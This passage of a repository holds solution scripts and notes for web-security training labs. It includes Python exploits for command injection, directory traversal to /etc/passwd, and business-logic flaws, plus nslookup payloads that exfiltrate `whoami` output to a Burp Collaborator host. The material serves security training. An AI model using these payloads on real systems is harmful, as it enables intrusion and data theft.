% sys.argv[0]) 52 | print("(+) Example: %s www.example.com" % sys.argv[0]) 53 | sys.exit(-1) 54 | 55 | s = requests.Session() 56 | url = sys.argv[1] 57 | buy_item(s, url) 58 | 59 | if __name__ == "__main__": 60 | main() -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-08/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #8 - Insufficient workflow validation 2 | 3 | Target Goal - Exploit logic flaw to purchase the "Lightweight l33t leather jacket". 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | 10 | -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-09/business-logic-flaw-lab-09.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | import re 6 | 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 10 | 11 | def get_csrf_token(s, url): 12 | r = s.get(url, verify=False, proxies=proxies) 13 | soup = BeautifulSoup(r.text, 'html.parser') 14 | csrf = soup.find("input", {"name": "csrf"})["value"] 15 | return csrf 16 | 17 | def delete_carlos(s, url): 18 | 19 | # Retrieve the CSRF token 20 | login_url = url + "/login" 21 | csrf_token = get_csrf_token(s, login_url) 22 | 23 | # Login as the wiener user 24 | print("(+) Logging in as the wiener user...") 25 | data_login = {"username": "wiener", "password": "peter", "csrf": csrf_token} 26 | 27 | r = s.post(login_url, data=data_login, allow_redirects=False, verify=False, proxies=proxies) 28 | 29 | # Delete Carlos user 30 | delete_carlos_url = url + "/admin/delete?username=carlos" 31 | r = s.get(delete_carlos_url, verify=False, proxies=proxies) 32 | res = r.text 33 | if "Congratulations" in res: 34 | print("(+) Successfully deleted the Carlos user!") 35 | else: 36 | print("(-) Could not delete the Carlos user.") 37 | sys.exit(-1) 38 | 39 | def main(): 40 | if len(sys.argv) != 2: 41 | print("(+) Usage: %s " % sys.argv[0]) 42 | print("(+) Example: %s www.example.com" % sys.argv[0]) 43 | sys.exit(-1) 44 | 45 | s = requests.Session() 46 | url = sys.argv[1] 47 | delete_carlos(s, url) 48 | 49 | if __name__ == "__main__": 50 | main() -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-09/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #9 - Authentication bypass via flawed state machine 2 | 3 | Target Goal - Exploit logic flaw to access admin functionality and delete Carlos user. 4 | 5 | Creds: wiener:peter 6 | 7 | Analysis: 8 | 9 | 10 | -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-10/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #10 - Infinite money logic flaw 2 | 3 | Target Goal - Exploit the logic flaw and purchase the Lightweight l33t leather jacket. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | 1337 = 100 + 3x 10 | 1227 = 3x 11 | x = 413 -------------------------------------------------------------------------------- /business-logic-vulnerabilities/lab-11/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #11 - Authentication bypass via encryption oracle 2 | 3 | Target Goal - Exploit logic flaw to access the admin panel and delete Carlos. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: -------------------------------------------------------------------------------- /business-logic-vulnerabilities/theory/Business Logic Vulnerabilities - Complete Guide.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rkhal101/Web-Security-Academy-Series/ad800b5dc2649815692b90b892dee474f82701f8/business-logic-vulnerabilities/theory/Business Logic Vulnerabilities - Complete Guide.pdf -------------------------------------------------------------------------------- /clickjacking/lab-01/clickjacking-lab-01.html: -------------------------------------------------------------------------------- 1 | 2 | 18 | 19 |
CLICK ME
20 | 21 | -------------------------------------------------------------------------------- /clickjacking/lab-01/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #1 - Basic clickjacking with CSRF token protection 2 | 3 | Target Goal - Perform a clickjacking attack that frames the account page and fools the user into deleting their account. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | -------------------------------------------------------------------------------- /clickjacking/lab-02/clickjacking-lab-02.html: -------------------------------------------------------------------------------- 1 | 17 | 18 |
CLICK ME
19 | 20 | -------------------------------------------------------------------------------- /clickjacking/lab-02/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #2 - Clickjacking with form input data prefilled from a URL parameter 2 | 3 | Target Goal - Perform a clickjacking attack that frames the account page and fools the user into changing their email address. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | -------------------------------------------------------------------------------- /clickjacking/lab-03/clickjacking-lab-03.html: -------------------------------------------------------------------------------- 1 | 18 | 19 | 20 |
CLICK ME
21 | 22 | 23 | -------------------------------------------------------------------------------- /clickjacking/lab-03/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #3 - Clickjacking with a frame buster script 2 | 3 | Target Goal - Perform a clickjacking attack that frames the account page and fools the user into changing their email address. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | -------------------------------------------------------------------------------- /clickjacking/lab-04/clickjacking-lab-04.html: -------------------------------------------------------------------------------- 1 | 18 | 19 |
CLICK ME
20 | 21 | -------------------------------------------------------------------------------- /clickjacking/lab-04/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #4 - Exploiting clickjacking vulnerability to trigger DOM-based XSS 2 | 3 | Target Goal - Perform a clickjacking attack that exploits an XSS vulnerability to call the print() function. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | -------------------------------------------------------------------------------- /clickjacking/lab-05/clickjacking-lab-05.html: -------------------------------------------------------------------------------- 1 | 25 | 26 |
CLICK ME FIRST
27 |
CLICK ME NEXT
28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /clickjacking/lab-05/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #5 - Multistep clickjacking 2 | 3 | Target Goal - Perform a multistep clickjacking attack to get the user to delete their account. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | -------------------------------------------------------------------------------- /clickjacking/theory/Clickjacking Complete Guide Theory Video Slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rkhal101/Web-Security-Academy-Series/ad800b5dc2649815692b90b892dee474f82701f8/clickjacking/theory/Clickjacking Complete Guide Theory Video Slides.pdf -------------------------------------------------------------------------------- /command-injection/lab-01/command-injection-lab-01.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def run_command(url, command): 10 | stock_path = '/product/stock' 11 | command_injection = '1 & ' + command 12 | params = {'productId': '1', 'storeId': command_injection} 13 | r = requests.post(url + stock_path, data=params, verify=False, proxies=proxies) 14 | if (len(r.text) > 3): 15 | print("(+) Command injection successful!") 16 | print("(+) Output of command: " + r.text) 17 | else: 18 | print("(-) Command injection failed.") 19 | 20 | def main(): 21 | if len(sys.argv) != 3: 22 | print("(+) Usage: %s " % sys.argv[0]) 23 | print("(+) Example: %s www.example.com whoami" % sys.argv[0]) 24 | sys.exit(-1) 25 | 26 | url = sys.argv[1] 27 | command = sys.argv[2] 28 | print("(+) Exploiting command injection...") 29 | run_command(url, command) 30 | 31 | if __name__ == "__main__": 32 | main() -------------------------------------------------------------------------------- /command-injection/lab-01/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #1 - OS command injection, simple case 2 | 3 | Target Goal - Exploit command injection to execute whoami command. 4 | 5 | Analysis: 6 | 7 | -------------------------------------------------------------------------------- /command-injection/lab-02/command-injection-lab-02.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 9 | 10 | def get_csrf_token(s, url): 11 | feedback_path = '/feedback' 12 | r = s.get(url + feedback_path, verify=False, proxies=proxies) 13 | soup = BeautifulSoup(r.text, 'html.parser') 14 | csrf = soup.find("input")['value'] 15 | return csrf 16 | 17 | def check_command_injection(s, url): 18 | submit_feedback_path = '/feedback/submit' 19 | command_injection = 'test@test.ca & sleep 10 #' 20 | csrf_token = get_csrf_token(s, url) 21 | data = {'csrf': csrf_token, 'name': 'test', 'email': command_injection, 'subject': 'test', 'message': 'test'} 22 | res = s.post(url + submit_feedback_path, data=data, verify=False, proxies=proxies) 23 | if (res.elapsed.total_seconds() >=10): 24 | print("(+) Email field vulnerable to time-based command injection!") 25 | else: 26 | print("(-) Email field not vulnerable to time-based command injection") 27 | 28 | def main(): 29 | if len(sys.argv) != 2: 30 | print("(+) Usage: %s " % sys.argv[0]) 31 | print("(+) Example: %s www.example.com" % sys.argv[0]) 32 | sys.exit(-1) 33 | 34 | url = sys.argv[1] 35 | print("(+) Checking if email parameter is vulnerable to time-based command injection...") 36 | 37 | s = requests.Session() 38 | check_command_injection(s, url) 39 | 40 | if __name__ == "__main__": 41 | main() -------------------------------------------------------------------------------- /command-injection/lab-02/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #2 - Blind OS command injection with time delays 2 | 3 | 4 | Target Goal - Exploit blind command injection in the feedback function. 5 | 6 | 7 | Analysis: 8 | 9 | -------------------------------------------------------------------------------- /command-injection/lab-03/command-injection-lab-03.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | from bs4 import BeautifulSoup 5 | 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 9 | 10 | def get_csrf_token(s,url): 11 | feedback_path = '/feedback' 12 | r = s.get(url + feedback_path, verify=False, proxies=proxies) 13 | soup = BeautifulSoup(r.text, 'html.parser') 14 | csrf = soup.find("input")['value'] 15 | return csrf 16 | 17 | def exploit_command_injection(s, url): 18 | submit_feedback_path = '/feedback/submit' 19 | command_injection = 'test@test.ca & whoami > /var/www/images/output2.txt #' 20 | csrf_token = get_csrf_token(s, url) 21 | data = {'csrf': csrf_token, 'name': 'test', 'email': command_injection, 'subject': 'test', 'message': 'test'} 22 | res = s.post(url + submit_feedback_path, data=data, verify=False, proxies=proxies) 23 | print("(+) Verifying if command injection exploit worked...") 24 | 25 | # verify command injection 26 | file_path = '/image?filename=output2.txt' 27 | res2 = s.get(url + file_path, verify=False, proxies=proxies) 28 | if (res2.status_code == 200): 29 | print("(+) Command injection successful!") 30 | print("(+) The following is the content of the command: " + res2.text) 31 | else: 32 | print("(-) Command injection was not successful.") 33 | 34 | def main(): 35 | if len(sys.argv) != 2: 36 | print("(+) Usage: %s " % sys.argv[0]) 37 | print("(+) Example: %s www.example.com" % sys.argv[0]) 38 | sys.exit(-1) 39 | 40 | url = sys.argv[1] 41 | print("(+) Exploiting blind command injection in email field...") 42 | 43 | s = requests.Session() 44 | exploit_command_injection(s, url) 45 | 46 | if __name__ == "__main__": 47 | main() -------------------------------------------------------------------------------- /command-injection/lab-03/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #3 - Blind OS command injection with output redirection 2 | 3 | Target Goal - Exploit the blind command injection and redirect the output from the whoami command to the /var/www/images 4 | 5 | 6 | Analysis: 7 | 8 | 1. Confirm blind command injection 9 | - email field 10 | 11 | 2. Check where images are store 12 | 13 | 3. Redirect output to file 14 | 15 | 4. Check if file was created 16 | 17 | -------------------------------------------------------------------------------- /command-injection/lab-04/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #4 - Blind OS command injection with out-of-band interaction 2 | 3 | Target Goal - Exploit blind OS command injection to issue a DNS lookup to Burp Collaborator 4 | 5 | Analysis: 6 | 7 | & nslookup zorh37nyfzjbsg1nog7j9ml6zx5ntc.burpcollaborator.net # -------------------------------------------------------------------------------- /command-injection/lab-05/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #5 - Blind OS command injection with out-of-band data exfiltration 2 | 3 | Target Goal - Exploit blind OS command injection to execute whoami command and exfiltrate output via DNS query to Burp collaborator. 4 | 5 | Analysis: 6 | 7 | & nslookup bt82fvhfm8v8bcfri5e1gp72itojc8.burpcollaborator.net # 8 | 9 | & nslookup `whoami`.bt82fvhfm8v8bcfri5e1gp72itojc8.burpcollaborator.net # 10 | 11 | & nslookup $(whoami).bt82fvhfm8v8bcfri5e1gp72itojc8.burpcollaborator.net # 12 | -------------------------------------------------------------------------------- /command-injection/theory/Command Injection Complete Guide Theory Video Slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rkhal101/Web-Security-Academy-Series/ad800b5dc2649815692b90b892dee474f82701f8/command-injection/theory/Command Injection Complete Guide Theory Video Slides.pdf -------------------------------------------------------------------------------- /cors/lab-01/cors-lab-01.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Hello World!

4 | 17 | 18 | -------------------------------------------------------------------------------- /cors/lab-01/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #1 - CORS vulnerability with basic origin reflection 2 | 3 | Target Goal - exploit the CORS misconfiguration to retrieve the administrator's API key 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | Testing for CORS misconfigurations: 10 | 1. change the origin to an arbitrary value / True 11 | 2. -------------------------------------------------------------------------------- /cors/lab-02/cors-lab-02.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 18 | 19 | -------------------------------------------------------------------------------- /cors/lab-02/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #2 - CORS vulnerability with trusted null origin 2 | 3 | Target Goal - exploit the CORS misconfiguration to retrieve the administrator's API key 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | Testing for CORS misconfigurations: 10 | 1. Change the origin header to an arbitrary value 11 | 2. Change the origin header to the null value 12 | 3. -------------------------------------------------------------------------------- /cors/lab-03/cors-lab-03.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Hello World!

4 | 7 | 8 | -------------------------------------------------------------------------------- /cors/lab-03/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #3 - CORS vulnerability with trusted insecure protocols 2 | 3 | Target Goal - exploit the CORS misconfiguration to retrieve the administrator's API key 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | Testing for CORS misconfigurations: 10 | 1. Change the origin header to an arbitrary value 11 | 2. Change the origin header to the null value 12 | 3. Change the origin header to one that begins with the origin of the site. 13 | 4. Change the origin header to one that ends with the origin of the site. -------------------------------------------------------------------------------- /cors/lab-04/cors-lab-04-step-1.html: -------------------------------------------------------------------------------- 1 | 2 | 18 | -------------------------------------------------------------------------------- /cors/lab-04/cors-lab-04-step-2.html: -------------------------------------------------------------------------------- 1 | 2 | 19 | -------------------------------------------------------------------------------- /cors/lab-04/cors-lab-04-step-3.html: -------------------------------------------------------------------------------- 1 | 2 | 19 | -------------------------------------------------------------------------------- /cors/lab-04/cors-lab-04-step-4.html: -------------------------------------------------------------------------------- 1 | 2 | 19 | -------------------------------------------------------------------------------- /cors/lab-04/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #4 - CORS vulnerability with internal network pivot attack 2 | 3 | Target Goals: 4 | 1. Use JS to locate an endpoint on the local network (192.168.0.0/24 port 8080) 5 | 2. Exploit CORS misconfiguration to delete user Carlos. 6 | 7 | Analysis: 8 | 9 | Steps to complete the exercise: 10 | 1. Scan the local network (192.168.0.0/24) for endpoints that have port 8080 open. 11 | Completed - http://192.168.0.181:8080 12 | 13 | 2. Try to find an XSS vulnerability in the login page 14 | Completed - username field vulnerable to XSS. 15 | 16 | 3. Use the XSS vulnerability in order to access an authenticated page. 17 | Completed - accessed the admin page. 18 | 19 | 4. Use XSS vulnerability to delete the Carlos user. 20 | -------------------------------------------------------------------------------- /cors/theory/CORS Complete Guide Theory Video Slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rkhal101/Web-Security-Academy-Series/ad800b5dc2649815692b90b892dee474f82701f8/cors/theory/CORS Complete Guide Theory Video Slides.pdf -------------------------------------------------------------------------------- /csrf/lab-01/csrf-lab01.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Hello World!

4 | 5 |
6 | 7 |
8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /csrf/lab-01/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #1 - CSRF vulnerability with no defenses 2 | 3 | Vulnerable parameter - email change functionality 4 | 5 | Goal - exploit the CSRF vulnerability and change the email address 6 | 7 | creds - wiener:peter 8 | 9 | Analysis: 10 | 11 | In order for a CSRF attack to be possible: 12 | - A relevant action - email change functionality 13 | - Cookie based session handling - session cookie 14 | - No unpredictable request parameters - satisfied 15 | 16 | -------------------------------------------------------------------------------- /csrf/lab-02/csrf-lab-02.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Hello World!

4 | 5 |
6 | 7 |
8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /csrf/lab-02/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #2 - CSRF where token validation depends on request method 2 | 3 | Vulnerable parameter - email change functionality 4 | 5 | Goal - exploit CSRF to change email address 6 | 7 | Creds - wiener:peter 8 | 9 | Analysis: 10 | 11 | In order for a CSRF attack to be possible: 12 | - A relevant action: change a users email 13 | - Cookie-based session handling: session cookie 14 | - No unpredictable request parameters: Request method can be changed to GET which does not require CSRF token 15 | 16 | Testing CSRF Tokens: 17 | 1. Change the request method from POST to GET 18 | -------------------------------------------------------------------------------- /csrf/lab-03/csrf-lab-03.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Hello World!

4 | 5 |
6 | 7 |
8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /csrf/lab-03/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #3 - CSRF where token validation depends on token being present 2 | 3 | Vulnerable parameter - email change functionality 4 | 5 | Goal - exploit CSRF to change email address 6 | 7 | Creds - wiener:peter 8 | 9 | Analysis: 10 | 11 | In order for a CSRF attack to be possible: 12 | - A relevant action: change a users email 13 | - Cookie-based session handling: session cookie 14 | - No unpredictable request parameters: csrf token is not mandatory 15 | 16 | Testing CSRF Tokens: 17 | 1. Remove the CSRF token and see if application accepts request 18 | 2. Change the request method from POST to GET 19 | -------------------------------------------------------------------------------- /csrf/lab-04/csrf-lab-04.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Hello World!

4 | 5 |
6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /csrf/lab-04/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #4 - CSRF where token is not tied to user session 2 | 3 | Vulnerable parameter - email change functionality 4 | 5 | Goal - exploit CSRF to change email address 6 | 7 | Credentials - wiener:peter, carlos:montoya 8 | 9 | Analysis: 10 | 11 | In order for a CSRF attack to be possible: 12 | - A relevant action: change a users email 13 | - Cookie-based session handling: session cookie 14 | - No unpredictable request parameters: csrf token is not tied to user session 15 | 16 | Testing CSRF Tokens: 17 | 1. Remove the CSRF token and see if application accepts request 18 | 2. Change the request method from POST to GET 19 | 3. See if csrf token is tied to user session -------------------------------------------------------------------------------- /csrf/lab-05/csrf-lab-05.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Hello World!

4 |
5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /csrf/lab-05/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #5 - CSRF where token is tied to non-session cookie 2 | 3 | Vulnerable parameter - email change functionality 4 | 5 | Goal - exploit CSRF to change email address 6 | 7 | Creds - wiener:peter, carlos:montoya 8 | 9 | Analysis: 10 | 11 | In order for a CSRF attack to be possible: 12 | - A relevant action: change a users email 13 | - Cookie-based session handling: session cookie 14 | - No unpredictable request parameters 15 | 16 | 17 | Testing CSRF Tokens: 18 | 1. Remove the CSRF token and see if application accepts request 19 | 2. Change the request method from POST to GET 20 | 3. See if csrf token is tied to user session 21 | 22 | Testing CSRF Tokens and CSRF cookies: 23 | 1. Check if the CSRF token is tied to the CSRF cookie 24 | - Submit an invalid CSRF token 25 | - Submit a valid CSRF token from another user 26 | 2. Submit valid CSRF token and cookie from another user 27 | 28 | csrf token: SXsROOTp3jzq6M5UzIL2KkJIqGpffIQb 29 | csrfKey cookie: ho7GGxMe4EZSrQ8xZ0sBDq2yW0ey9bKH 30 | 31 | In order to exploit this vulnerability, we need to perform 2 things: 32 | 1. Inject a csrfKey cookie in the user's session (HTTP Header injection) - satisfied 33 | 2. Send a CSRF attack to the victim with a known csrf token 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /csrf/lab-06/csrf-lab-06.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Hello World!

4 |
5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /csrf/lab-06/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #6 - CSRF where token is duplicated in cookie 2 | 3 | Vulnerable parameter - email change functionality 4 | 5 | Goal - exploit CSRF to change email address 6 | 7 | Creds - wiener:peter 8 | 9 | Analysis: 10 | 11 | In order for a CSRF attack to be possible: 12 | - A relevant action: change a users email 13 | - Cookie-based session handling: session cookie 14 | - No unpredictable request parameters 15 | 16 | Testing CSRF Tokens: 17 | 1. Remove the CSRF token and see if application accepts request 18 | 2. Change the request method from POST to GET 19 | 3. See if csrf token is tied to user session 20 | 21 | Testing CSRF Tokens and CSRF cookies: 22 | 1. Check if the CSRF token is tied to the CSRF cookie 23 | - Submit an invalid CSRF token 24 | - Submit a valid CSRF token from another user 25 | 2. Submit valid CSRF token and cookie from another user 26 | 27 | 28 | In order to exploit this vulnerability, we need to perform 2 things: 29 | 1. Inject a csrf cookie in the user's session (HTTP Header injection) - satisfied 30 | 2. Send a CSRF attack to the victim with a known csrf token -------------------------------------------------------------------------------- /csrf/lab-07/csrf-lab-07.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |

Hello world!

9 |
10 | 11 |
12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /csrf/lab-07/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #7 - CSRF where Referer validation depends on header being present 2 | 3 | Vulnerable parameter - email change functionality 4 | 5 | Goal - exploit CSRF to change email address 6 | 7 | Creds - wiener:peter 8 | 9 | Analysis: 10 | 11 | In order for a CSRF attack to be possible: 12 | - A relevant action: change a users email 13 | - Cookie-based session handling: session cookie 14 | - No unpredictable request parameters: no csrf token 15 | 16 | Testing Referer header for CSRF attacks: 17 | 1. Remove the Referer header -------------------------------------------------------------------------------- /csrf/lab-08/csrf-lab-08.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |

Hello World!

5 |
6 | 7 |
8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /csrf/lab-08/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #8 - CSRF where token is duplicated in cookie 2 | 3 | Vulnerable parameter - email change functionality 4 | 5 | Goal - exploit CSRF to change email address 6 | 7 | Creds - wiener:peter 8 | 9 | Analysis: 10 | 11 | In order for a CSRF attack to be possible: 12 | - A relevant action: change a users email 13 | - Cookie-based session handling: session cookie 14 | - No unpredictable request parameters (satisfied b/c no csrf token) 15 | 16 | Testing Referer header for CSRF attacks: 17 | 1. Remove the Referer header 18 | 2. Check which portion of the referrer header is the application validating -------------------------------------------------------------------------------- /csrf/lab-09/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #9 - SameSite Lax bypass via method override 2 | 3 | Goal - Exploit CSRF to change the victim's email address. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | -------------------------------------------------------------------------------- /csrf/lab-10/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #10 - SameSite Strict bypass via client-side redirect 2 | 3 | Goal - Exploit CSRF to change the victim's email address. 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 | -------------------------------------------------------------------------------- /csrf/lab-11/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #11 - SameSite Strict bypass via sibling domain 2 | 3 | Goal - Perform a cross-site websocket hijacking attack to exfiltrate the victim's chat history and compromise the victim's account. 4 | 5 | Analysis: 6 | 7 | Cross-Site Websocket Hijacking Attack: 8 | -------------------------------------- 9 | 19 | 20 | 21 | Cross-Site Websocket Hijacking Attack + XSS: 22 | -------------------------------------------- 23 | -------------------------------------------------------------------------------- /csrf/lab-12/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #12 - SameSite Lax bypass via cookie refresh 2 | 3 | Goal - Exploit CSRF to change the victim's email address 4 | 5 | Creds - wiener:peter 6 | 7 | Analysis: 8 | 9 |
10 | 11 |
12 |

Click anywhere on the page

13 | 14 | -------------------------------------------------------------------------------- /csrf/theory/CSRF Complete Guide Theory Video Slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rkhal101/Web-Security-Academy-Series/ad800b5dc2649815692b90b892dee474f82701f8/csrf/theory/CSRF Complete Guide Theory Video Slides.pdf -------------------------------------------------------------------------------- /directory-traversal/lab-01/directory-traversal-lab-01.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import urllib3 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | 6 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 7 | 8 | def directory_traversal_exploit(url): 9 | image_url = url +'/image?filename=../../../../etc/passwd' 10 | r = requests.get(image_url, verify=False, proxies=proxies) 11 | if 'root:x' in r.text: 12 | print('(+) Exploit successful!') 13 | print('(+) The following is the content of the /etc/passwd file:') 14 | print(r.text) 15 | else: 16 | print('(-) Exploit failed.') 17 | sys.exit(-1) 18 | 19 | def main(): 20 | if len(sys.argv) != 2: 21 | print("(+) Usage: %s " % sys.argv[0]) 22 | print("(+) Example: %s www.example.com" % sys.argv[0]) 23 | sys.exit(-1) 24 | 25 | url = sys.argv[1] 26 | print("(+) Exploiting the directory traversal vulnerability...") 27 | directory_traversal_exploit(url) 28 | 29 | if __name__ == "__main__": 30 | main() -------------------------------------------------------------------------------- /directory-traversal/lab-01/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #1 - File path traversal, simple case 2 | 3 | Target Goal - Retrieve the contents of the /etc/passwd file. 4 | 5 | Analysis: 6 | 7 | /var/www/images/65.jpg 8 | 9 | /etc/passwd -------------------------------------------------------------------------------- /directory-traversal/lab-02/directory-traversal-lab-02.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import urllib3 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | 6 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 7 | 8 | def directory_traversal_exploit(url): 9 | image_url = url + '/image?filename=/etc/passwd' 10 | r = requests.get(image_url, verify=False, proxies=proxies) 11 | if 'root:x' in r.text: 12 | print('(+) Exploit successful!') 13 | print('(+) The following is the content of the /etc/passwd file:') 14 | print(r.text) 15 | else: 16 | print('(-) Exploit failed.') 17 | sys.exit(-1) 18 | 19 | def main(): 20 | if len(sys.argv) != 2: 21 | print("(+) Usage: %s " % sys.argv[0]) 22 | print("(+) Example: %s www.example.come" % sys.argv[0]) 23 | sys.exit(-1) 24 | 25 | url = sys.argv[1] 26 | print("(+) Exploiting directory traversal vulnerability...") 27 | directory_traversal_exploit(url) 28 | 29 | if __name__ == "__main__": 30 | main() -------------------------------------------------------------------------------- /directory-traversal/lab-02/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #2 - File path traversal, traversal sequences blocked with absolute path bypass 2 | 3 | Target Goal - Retrieve the contents of the /etc/passwd file. 4 | 5 | Analysis: 6 | -------------------------------------------------------------------------------- /directory-traversal/lab-03/directory-traversal-lab-03.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def directory_traversal_exploit(url): 10 | image_url = url + '/image?filename=....//....//....//....//etc/passwd' 11 | r = requests.get(image_url, verify=False, proxies=proxies) 12 | if 'root:x' in r.text: 13 | print('(+) Exploit successful!') 14 | print('(+) The following is the content of the /etc/passwd file:') 15 | print(r.text) 16 | else: 17 | print('(-) Exploit failed.') 18 | sys.exit(-1) 19 | 20 | def main(): 21 | if len(sys.argv) != 2: 22 | print("(+) Usage: %s " % sys.argv[0]) 23 | print("(+) Example: %s www.example.com" % sys.argv[0]) 24 | sys.exit(-1) 25 | 26 | url = sys.argv[1] 27 | print("(+) Exploiting the directory traversal vulnerability...") 28 | directory_traversal_exploit(url) 29 | 30 | if __name__ == "__main__": 31 | main() -------------------------------------------------------------------------------- /directory-traversal/lab-03/notes.txt: -------------------------------------------------------------------------------- 1 | Lab #3 - File path traversal, traversal sequences stripped non-recursively 2 | 3 | Target Goal - Retrieve the contents of the /etc/passwd file. 4 | 5 | Analysis: 6 | 7 | /etc/passwd 8 | ../../../../etc/passwd 9 | ....//....//....//....//etc/passwd 10 | 11 | ../ -------------------------------------------------------------------------------- /directory-traversal/lab-04/directory-traversal-lab-04.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import urllib3 4 | 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 8 | 9 | def directory_traversal_exploit(url): 10 | image_url = url + 